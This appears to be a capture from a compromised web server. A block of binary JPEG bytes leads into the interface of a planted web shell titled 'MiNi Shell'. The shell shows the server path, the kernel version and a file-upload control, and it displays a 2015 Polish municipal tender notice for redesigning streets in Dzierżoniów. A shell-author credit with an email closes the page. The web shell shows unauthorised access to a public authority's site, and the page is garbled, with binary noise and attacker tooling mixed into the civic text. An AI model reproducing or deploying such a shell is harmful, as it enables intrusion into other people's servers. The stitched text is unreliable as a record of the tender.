JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150907/131907-N-2015.html

<p class="kh_header"><b>Dzierżoniów: Wykonanie dokumentacji projektowej dotyczącej przebudowy ulicy Szpitalnej o długości 294 m, ulicy Okrzei o długości 178 m oraz ulicy Cichej na odcinku 2524m od ulicy Ząbkowickiej do granic miasta w kierunku Dobrocina i odcinka ulicy Cichej (bocznej) o długości 487 m w kierunku gospodarstwa zlokalizowanego na działce 890 obręb Przedmieście, w ramach zadania inwestycyjnego p.n.: Przebudowa ulic Cichej, Szpitalnej, Okrzei w Dzierżoniowie.</b><br>
<b>Numer ogłoszenia: 131907 - 2015; data zamieszczenia: 07.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Dzierżoniów , Rynek 1, 58-200 Dzierżoniów, woj. dolnośląskie, tel. 74 6450800, faks 74 6450801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzierzoniow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej dotyczącej przebudowy ulicy Szpitalnej o długości 294 m, ulicy Okrzei o długości 178 m oraz ulicy Cichej na odcinku 2524m od ulicy Ząbkowickiej do granic miasta w kierunku Dobrocina i odcinka ulicy Cichej (bocznej) o długości 487 m w kierunku gospodarstwa zlokalizowanego na działce 890 obręb Przedmieście, w ramach zadania inwestycyjnego p.n.: Przebudowa ulic Cichej, Szpitalnej, Okrzei w Dzierżoniowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje wykonanie dokumentacji projektowej dotyczącej przebudowy ulicy Szpitalnej o długości 294 m, ulicy Okrzei o długości 178 m oraz ulicy Cichej na odcinku 2524 m od ulicy Ząbkowickiej do granic miasta w kierunku Dobrocina i odcinka ulicy Cichej (bocznej) o długości 487 m w kierunku gospodarstwa zlokalizowanego na działce 890 obręb Przedmieście, w ramach zadania inwestycyjnego p.n.: Przebudowa ulic Cichej, Szpitalnej, Okrzei.

1.1Inwestycja będzie realizowana przy udziale środków zewnętrznych.

2.Zakres rzeczowy przedmiotu zamówienia obejmuje wykonanie dokumentacji projektowej 
i  specyfikacji technicznych wykonania i odbioru robót budowlanych oraz kosztorysu inwestorskiego i przedmiaru robót zgodnie z: 
a)Rozporządzeniem Ministra Infrastruktury z 02.09.2004r. w sprawie szczegółowego  zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania 
i   odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz.U. 
z 2004r.   Nr 202, poz. 2072 z późniejszymi zmianami) w zakresie branż: drogowej, sanitarnej -  kanalizacja deszczowa i elektrycznej - oświetlenie uliczne. 
b)Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r.  (Dz. U. nr 43 poz. 430 ze zmianami) w sprawie warunków technicznych, jakim powinny  odpowiadać drogi publiczne i ich usytuowanie. 
W przypadku udokumentowanego braku możliwości uzyskania parametrów zgodnych 
z w/w rozporządzeniem należy uzyskać zgodę na odstępstwo od w/w warunków występując do Ministra Infrastruktury. Do projektu należy przedłożyć oświadczenie projektanta, że rozwiązania projektowe są zgodne z wymaganiami w/w rozporządzenia.
c)Rozporządzeniem Ministra Infrastruktury z dnia 23 września 2003 r. (Dz. U. nr 177 poz. 1729) w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz  wykonywania nadzoru nad tym zarządzaniem,
d)Rozporządzeniem Ministra Infrastruktury z dn. 18.05.2004r. w sprawie określania metod  i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz.U. z 2004r. Nr 130, poz. 1389).

3.Zakres rzeczowy przedmiotu zamówienia obejmuje ponadto:
1)Uzyskanie zgody od właściwego organu na realizację robót oraz wszelkich innych decyzji wymaganych prawem wraz z wszelkimi wymaganymi uzgodnieniami,  
2)Wykonanie wszelkich niezbędnych opracowań (w tym opinii i ekspertyz) wymaganych obowiązującym prawem warunkujących uzyskanie zgody na realizację robót, w tym decyzji o środowiskowych uwarunkowaniach dla przedmiotowego przedsięwzięcia,
3) Wykonanie operatu wodno - prawnego,
4)Uzyskanie z Referatu Architektury Urzędu Miasta w Dzierżoniowie  wypisu  
i wyrysu z Miejscowego Planu Zagospodarowania Przestrzennego,
5)Uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego,
6)Uzyskanie mapy sytuacyjno - wysokościowej dla celów projektowych,
7)Uzyskanie warunków przyłączenia oświetlenia ulicznego i kanalizacji deszczowej,
8)Wykonanie projektów tymczasowej organizacji ruchu na czas prowadzenia robót 
i  projektów stałej  organizacji ruchu wraz z uzyskaniem stosownych pozwoleń na ich  wprowadzenie. Oznakowanie poziome grubowarstwowe.
9)Wykonanie niezbędnych badań geologicznych dla potrzeb ustalenia nośności  
           podbudowy i jej wykorzystania pod nawierzchnię SMA,
10)Usunięcie kolizji z urządzeniami i sieciami podziemnymi,
11)Uzyskanie zgody na wycinkę drzew.

4. Należy sporządzić niezbędną ilość egzemplarzy projektów budowlanych w celu  przekazania ich odpowiednim instytucjom oraz dostarczyć Zamawiającemu: 
-projekt budowlany przebudowy ulic wraz z oświetleniem i odwodnieniem - po 5  
  egzemplarzy dla każdej z ulic,
-projekt wykonawczy przebudowy ulicy wraz z oświetleniem i odwodnieniem - po 5  
   egzemplarzy dla każdej z ulic,
-projekt tymczasowej organizacji ruchu - 3 egzemplarze,
-projekt stałej organizacji ruchu - 3 egzemplarze,
-przedmiar robót przebudowy ulicy - po 2 egzemplarze z podziałem na branże dla każdej z  ulic,
-kosztorys inwestorski przebudowy ulicy  - po 2 egzemplarze z podziałem na branże dla  
  każdej ulicy,
-specyfikacje techniczne wykonania i odbioru robót budowlanych w zakresie przebudowy  ulic - 5 egzemplarzy.

Ponadto należy przekazać Zamawiającemu w/w dokumentację w formie elektronicznej PDF. 

5. Zakres rzeczowy projektu budowlanego obejmuje w szczególności:
1)Wymianę nawierzchni jezdni na SMA. Nośność po przebudowie 100KN/oś. Wykorzystanie krawężników kamiennych do ponownego wbudowania na ul. Cichej na odcinku od 
ul. Ząbkowickiej do ul. Szpitalnej. Na pozostałych ulicach krawężniki betonowe.
2)Wymianę  nawierzchni chodników na kostkę betonową i wymianę obrzeży. Na przejściach  dla pieszych zastosować kostkę integracyjną typu STOP,
3)Budowę zatok parkingowych,
4)Budowę parkingu na ul. Cichej na wysokości Szpitala oraz przebudowę parkingu na ul.  Szpitalnej,
5)Budowę ścieżki rowerowej z kostki betonowej bezfazowej w ulicy Szpitalnej i budowę ciągu pieszo-rowerowego z asfaltobetonu w ul. Cichej na odcinku od ul. Szpitalnej do  granic miasta w kierunku Dobrocina. Masa z asfaltobetonu z zastosowaniem koloru 
w celu rozróżnienia ścieżki rowerowej od ciągu pieszego. 
6)Budowę przekrycia rowów przydrożnych dla potrzeb realizacji ciągu pieszo-rowerowego,
7)Wykonanie min. 2 Miejsc Obsługi Podróżnych przy ciągu pieszo-rowerowym wyposażonych także w siłownię plenerową (3 - 4 urządzenia fitness),
8)Budowę zatoki autobusowej przed ulicą Szpitalną z kierunku Dobrocina dla osób  wysiadających, uwzględnienie w ul. Cichej przystanków na żądanie,
9)Wykonanie zjazdów do posesji i pól uprawnych, w tym zjazdów z ul. Cichej (bocznej)  przy moście na działki nr  876 i 881,
10)Budowę oświetlenia ulicznego z okablowaniem. Oprawy oświetleniowe typu LED. Dla  odcinka ulicy Cichej (bocznej) do działki nr 890, o długości 487m zastosować oświetlenie hybrydowe w ilości 4szt.,   
11)Regulację studni kanalizacji deszczowej i sanitarnej wraz z wymianą włazów, regulację  istniejących wpustów deszczowych,
12)Budowę kanalizacji deszczowej,
13)Usunięcie kolizji z urządzeniami i sieciami podziemnymi i naziemnymi, w tym ich  regulacja do projektowanych rzędnych nawierzchni,
14)Przebudowę terenów zielonych,
15)Przebudowę i profilowanie rowów przydrożnych,
16)Przebudowę i budowę przepustów,
17)Roboty budowlane związane z połączeniem projektowanych ulic i chodników 
z  istniejącymi, sąsiadującymi ulicami, chodnikami, zjazdami itp. W przypadku ingerencji w  obiekty przyległe należy uwzględnić ich naprawę, uzupełnienie 
itp. (np.: odkrycie  fundamentów ogrodzeń w związku z obniżeniem rzędnej ulicy)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Przedmiotem zamówień uzupełniających będą usługi tożsame z usługą stanowiącą przedmiot niniejszego zamówienia. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazać w załączniku nr 4 do SIWZ usługi wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert w postępowaniu, 
a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane 
oraz załączyć dowody dotyczące wykonania 
minimum 2 projektów budowlanych dotyczących budowy, przebudowy lub remontu dróg wraz z ich odwodnieniem i oświetleniem o długości minimum 870 m każda,
określające czy usługi te zostały wykonane w sposób należyty.

Ocena spełnienia warunku wymaganego od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazać w załączniku nr 5 do SIWZ osoby, które będą uczestniczyć 
w wykonywaniu zamówienia, w szczególności odpowiedzialnych za projektowanie w specjalności:
a)	drogowej,
b)	instalacyjnej w zakresie sieci, instalacji  i urządzeń elektrycznych 
i elektroenergetycznych,
c)	 instalacyjnej w zakresie sieci, instalacji i urządzeń  kanalizacyjnych;

wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami 
oraz 
złożenie oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia - poprzez wypełnienie i podpisanie załącznika nr 5 do SIWZ.

Ocena spełnienia warunku wymaganego od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - Termin Wykonania - 1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W zakresie terminu i wynagrodzenia - w przypadku wystąpienia okoliczności, które mają wpływ na rezygnację z części zamówienia lub jego zmiany, których nie można było przewidzieć na etapie formułowania zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.dzierzoniow.pl/Article/id,1348.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2015 godzina 10:00, miejsce: Urząd Miasta Dzierżoniów, ul Rynek 1, Biuro Obsługi Klienta, stanowisko A - Informacja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja będzie realizowana przy udziale środków zewnętrznych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com